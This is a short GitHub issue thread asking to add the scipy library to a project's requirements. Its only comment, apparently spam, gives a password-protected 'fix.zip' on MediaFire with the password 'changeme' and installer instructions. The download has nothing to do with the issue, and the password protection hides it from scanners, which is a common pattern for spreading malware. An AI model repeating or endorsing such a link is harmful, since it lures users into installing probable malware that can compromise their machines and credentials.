### ISSUE TITLE
[Sprint] Add scipy library for netspresso-trainer to requirements

### ISSUE THREAD

**Issue by Only-bottle** [Nota-NetsPresso/netspresso-python#363]
## Description

- Add scipy library for netspresso-trainer to requirements.

## Checklists

- [x] I would create a corresponding branch for this issue from the designated (mostly `develop`) branch.
- [x] This issue only contains a preceding agreement between project owners.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
